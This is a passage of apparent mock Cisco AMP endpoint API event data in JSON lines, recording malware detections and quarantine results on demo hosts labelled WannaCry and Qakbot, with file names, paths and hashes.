Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
